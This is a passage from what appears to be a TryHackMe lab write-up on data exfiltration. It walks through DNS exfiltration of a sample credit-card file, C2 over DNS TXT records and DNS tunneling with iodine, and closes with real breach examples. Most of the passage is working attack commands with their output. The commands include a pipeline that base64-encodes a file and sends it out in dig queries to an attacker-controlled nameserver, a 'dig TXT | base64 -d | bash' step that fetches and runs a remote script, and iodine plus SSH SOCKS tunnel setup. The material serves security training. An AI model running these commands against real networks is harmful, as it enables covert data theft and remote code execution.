NCBJbnRlcm5ldCwgVE.t1.tunnel.com
hNCkNyZWRpdCBDYXJk.t1.tunnel.com
OiAxMjM0LTEyMzQtMT.t1.tunnel.com
IzNC0xMjM0CkV4cGly.t1.tunnel.com
ZTogMDUvMDUvMjAyMg.t1.tunnel.com
pDb2RlOiAxMzM3Cg==.t1.tunnel.com
```

In the previous command, we read the file's content and encoded it using Base64. Then, we cleaned the string by removing the new lines and gathered every 18 characters as a group. Finally, we appended the name server `t1.tunnel.com` for every group.

Let's check the other way where we send a single DNS request, which we will be using for our data exfiltration. This time, we split every 18 characters with a dot `.` and add the name server similar to what we did in the previous command.

```bash
thm@victim2:~$ cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/t1.tunnel.com/
TmFtZTogVEhNLXVzZX.IKQWRkcmVzczogMTIz.NCBJbnRlcm5ldCwgVE.hNCkNyZWRpdCBDYXJk.OiAxMjM0LTEyMzQtMT.IzNC0xMjM0CkV4cGly.ZTogMDUvMDUvMjAyMg.pDb2RlOiAxMzM3Cg==.t1.tunnel.com
```

Next, we send the base64 data as a subdomain name with considering the DNS limitation as follows:

```bash
hm@victim2:~$ cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/t1.tunnel.com/ | awk '{print "dig +short " $1}' | bash
```

With some adjustments to the single DNS request, we created and added the dig command to send it over the DNS, and finally, we passed it to the bash to be executed. If we check the Attacker's tcpdump terminal, we should receive the data we sent:

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/Neo-reGeorg]
└─$ sudo tcpdump -i tun0 udp port 53 -v
tcpdump: listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
15:53:14.779685 IP (tos 0x0, ttl 63, id 32754, offset 0, flags [none], proto UDP (17), length 103)
    10.10.191.192.58595 > 10.14.45.90.domain: 56047% [1au] A? _.pDb2RlOiAxMzM3Cg==.t1.tunnel.com. (75)
15:53:14.818040 IP (tos 0x0, ttl 63, id 32755, offset 0, flags [none], proto UDP (17), length 234)
    10.10.191.192.49277 > 10.14.45.90.domain: 34337% [1au] A? TmFtZTogVEhNLXVzZX.IKQWRkcmVzczogMTIz.NCBJbnRlcm5ldCwgVE.hNCkNyZWRpdCBDYXJk.OiAxMjM0LTEyMzQtMT.IzNC0xMjM0CkV4cGly.ZTogMDUvMDUvMjAyMg.pDb2RlOiAxMzM3Cg==.t1.tunnel.com. (206)
15:53:22.836681 IP (tos 0x0, ttl 64, id 36123, offset 0, flags [DF], proto UDP (17), length 72)
    10.14.45.90.34498 > 10.10.191.192.domain: 64134+ PTR? 192.191.10.10.in-addr.arpa. (44)
15:53:22.873001 IP (tos 0x0, ttl 63, id 34743, offset 0, flags [DF], proto UDP (17), length 122)
    10.10.191.192.domain > 10.14.45.90.34498: 64134 NXDomain*- 0/1/0 (94)
15:53:30.884665 IP (tos 0x0, ttl 64, id 19521, offset 0, flags [DF], proto UDP (17), length 70)
    10.14.45.90.58393 > 10.10.191.192.domain: 56610+ PTR? 90.45.14.10.in-addr.arpa. (42)
15:53:30.921553 IP (tos 0x0, ttl 63, id 36654, offset 0, flags [DF], proto UDP (17), length 120)
    10.10.191.192.domain > 10.14.45.90.58393: 56610 NXDomain*- 0/1/0 (92)
```

Once our DNS request is received, we can stop the tcpdump tool and clean the received data by removing unwanted strings, and finally decode back the data using Base64 as follows:

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/Neo-reGeorg]
└─$ echo "TmFtZTogVEhNLXVzZX.IKQWRkcmVzczogMTIz.NCBJbnRlcm5ldCwgVE.hNCkNyZWRpdCBDYXJk.OiAxMjM0LTEyMzQtMT.IzNC0xMjM0CkV4cGly.ZTogMDUvMDUvMjAyMg.pDb2RlOiAxMzM3Cg==.t1.tunnel.com." | cut -d"." -f1-8 | tr -d "." | base64 -d
Name: THM-user
Address: 1234 Internet, THM
Credit Card: 1234-1234-1234-1234
Expire: 05/05/2022
Code: 1337
```

### C2 Communications over DNS

C2 frameworks use the DNS protocol for communication, such as sending a command execution request and receiving execution results over the DNS protocol. They also use the TXT DNS record to run a dropper to download extra files on a victim machine. This section simulates how to execute a bash script over the DNS protocol.

For example, let's say we have a script that needs to be executed in a victim machine. First, we need to encode the script as a Base64 representation and then create a TXT DNS record of the domain name you control with the content of the encoded script. The following is an example of the required script that needs to be added to the domain name:

```bash
#!/bin/bash 
ping -c 1 test.thm.com
```

The script executes the ping command in a victim machine and sends one ICMP packet to `test.tunnel.com`. Note that the script is an example, which could be replaced with any content. Now save the script to`/tmp/script.sh` using your favorite text editor and then encode it with Base64 as follows:

```bash
thm@victim2:~$ cat /tmp/script.sh | base64 
IyEvYmluL2Jhc2ggCnBpbmcgLWMgMSB0ZXN0LnRobS5jb20K
```

Now that we have the Base64 representation of our script, we add it as a `TXT` DNS record to the domain we control, which in this case, the `tunnel.com`.

Once we added it, let's confirm that we successfully created the script's DNS record by asking the local DNS server to resolve the TXT record of the `script.tunnel.com`. If everything is set up correctly, we should receive the content we added in the previous step.
![08e1b0adfa64d1703ccbc7671e9db09b.png](../img/08e1b0adfa64d1703ccbc7671e9db09b.png)

```bash
thm@victim2:~$ dig @10.10.191.192 +short -t TXT script.tunnel.com
"IyEvYmluL2Jhc2ggCnBpbmcgLWMgMSB0ZXN0LnRobS5jb20K"
```

We used the dig command to check the TXT record of our DNS record that we added in the previous step! As a result, we can get the content of our script in the TXT reply. Now we confirmed the TXT record, let's execute it as follows:

```bash
thm@victim2:~$ dig @10.10.191.192 +short -t TXT script.tunnel.com | tr -d "\"" | base64 -d | bash
PING test.thm.com (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.021 ms

--- test.thm.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.021/0.021/0.021/0.000 ms
PING test.thm.com (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.017 ms

--- test.thm.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms
```

Note that we cleaned the output before executing the script using `tr` and deleting any double quotes `"`. Then, we decoded the Base64 text representation using `base64 -d` and finally passed the content to the `bash` command to execute.

## DNS Tunneling

### DNS Tunneling (TCPoverDNS)

This technique is also known as TCP over DNS, where an attacker encapsulates other protocols, such as HTTP requests, over the DNS protocol using the DNS Data Exfiltration technique. DNS Tunneling establishes a communication channel where data is sent and received continuously.

![0093dc6ccfef0be3cd019484488a34b9.png](../img/0093dc6ccfef0be3cd019484488a34b9.png)

We will be using the [iodine](https://github.com/yarrick/iodine) tool for creating our DNS tunneling communications.

Let's follow the steps to create a DNS tunnel. First, let's run the server-side application (iodined) as follows:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/Neo-reGeorg]
└─$ sudo iodined -f -c -P thmpass 10.1.1.1/24 t1.tunnel.com
[sudo] password for parallels: 
Opened dns0
Setting IP of dns0 to 10.1.1.1
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain t1.tunnel.com
```

Let's explain the previous command a bit more:

- Ensure to execute the command with sudo. The iodined creates a new network interface (dns0) for the tunneling over the DNS.
- The `-f` argument is to run the server in the foreground.
- The `-c` argument is to skip checking the client IP address and port for each DNS request.
- The `-P` argument is to set a password for authentication.
-  The `10.1.1.1/24` argument is to set the network IP for the new network interface (dns0). The IP address of the server will be 10.1.1.1 and the client 10.1.1.2.
- `t1.tunnel.com` is the nameserver we previously set.

On the JumpBox machine, we need to connect to the server-side application. To do so, we need to execute the following:
```bash
thm@jump-box:~$ sudo iodine -P thmpass t1.tunnel.com
[sudo] password for thm: 
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for t1.tunnel.com to 127.0.0.11
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 10.1.1.2
Setting MTU of dns0 to 1130
Server tunnel IP is 10.1.1.1
Testing raw UDP data to the server (skip with -r)
Server is at 10.14.45.90, trying raw login: OK
Sending raw traffic directly to 10.14.45.90
Connection setup complete, transmitting data.
Detaching from terminal...
```

Note that all communication over the network 10.1.1.1/24 will be over the DNS. We will be using the -D argument for the dynamic port forwarding feature to use the SSH session as a proxy. Note that we used the -f argument to enforce ssh to go to the background. The -4 argument forces the ssh client to bind on IPv4 only. 
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/Neo-reGeorg]
└─$ ssh thm@10.1.1.2 -4 -f -N -D 1080
```

Now that we have connected to JumpBox over the dns0 network, open a new terminal and use ProxyChains or Firefox with 127.0.0.1 and port 1080 as proxy settings. 
```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php

<p>THM{DN5-Tunn311n9-1s-c00l}</p>
```

## Conclusion
### Examples

The following are companies that were victims of data breaches using data exfiltration techniques.

1. **SunTrust Bank** had an insider data breach that uncovered suspicious traffic leaving the network after the theft of up to 1.5 million customer-sensitive data, including names, addresses, phone numbers, and account balances.
2. **Tesla** was a victim of data exfiltration by an insider, which caused a data breach. In 2018, an employee exfiltrated gigabytes of confidential photos and code manufacturing OS to third parties, including other personal and sensitive data.
3. **Travelex** is the world's leading currency exchange specialist. In 2020, it was a victim of ransomware called Sodinokibi. The attacker exploits an unpatched vulnerability of one of the internal servers. The attacker exploited an unpatched vulnerability in one of the internal servers, which allowed them to exfiltrate sensitive data out of the organization's network using one of the exfiltration techniques. The sensitive data included personally identifiable information (PII) and financial information.

### Additional Resources

Data Exfiltration is not limited to protocols and methods discussed in this room. The following link is a Living Off Trusted Sites that could be used to exfiltrate data or for C2 communication using legitimate websites. 
- [Living Off Trusted Sites (LOTS) Project](https://lots-project.com/)
